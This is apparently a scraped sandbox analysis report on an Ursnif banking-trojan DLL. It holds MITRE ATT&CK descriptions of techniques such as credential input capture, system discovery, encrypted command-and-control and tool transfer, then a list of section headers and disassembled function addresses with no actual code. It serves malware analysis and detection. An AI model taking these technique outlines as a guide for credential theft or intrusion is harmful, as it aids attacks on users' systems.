Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 0pz1on1.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Function 044B523B, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 00401006, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 044B65CE, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 044B6066, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 00401E57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 004011EA, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 044B1000, Relevance: 27.2, APIs: 18, Instructions: 212
memorystringCOMMON

Function 00401F17, Relevance: 22.6, APIs: 15, Instructions: 112
threadsleepsynchronizationCOMMON

Function 044B6130, Relevance: 16.7, APIs: 11, Instructions: 152
timememoryCOMMON

Function 044B8492, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 044B4800, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00401815, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 00401C1F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 044BA5F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Function 044B1E95, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 044B6810, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157
stringCOMMON

Function 00401B04, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Function 044B38B1, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 044B567B, Relevance: 6.0, APIs: 4, Instructions: 38
sleepmemorythreadCOMMON

Function 044B6A7F, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 044B5B7A, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Function 00401338, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 00401280, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Function 044B37B4, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 044B3695, Relevance: 3.1, APIs: 2, Instructions: 52
memorytimeCOMMON

Function 044B59CA, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 004017EF, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 044B6D10, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00401151, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Function 044B4509, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Function 044B46B8, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Function 044B3B9B, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Function 044B8779, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Function 044B5946, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre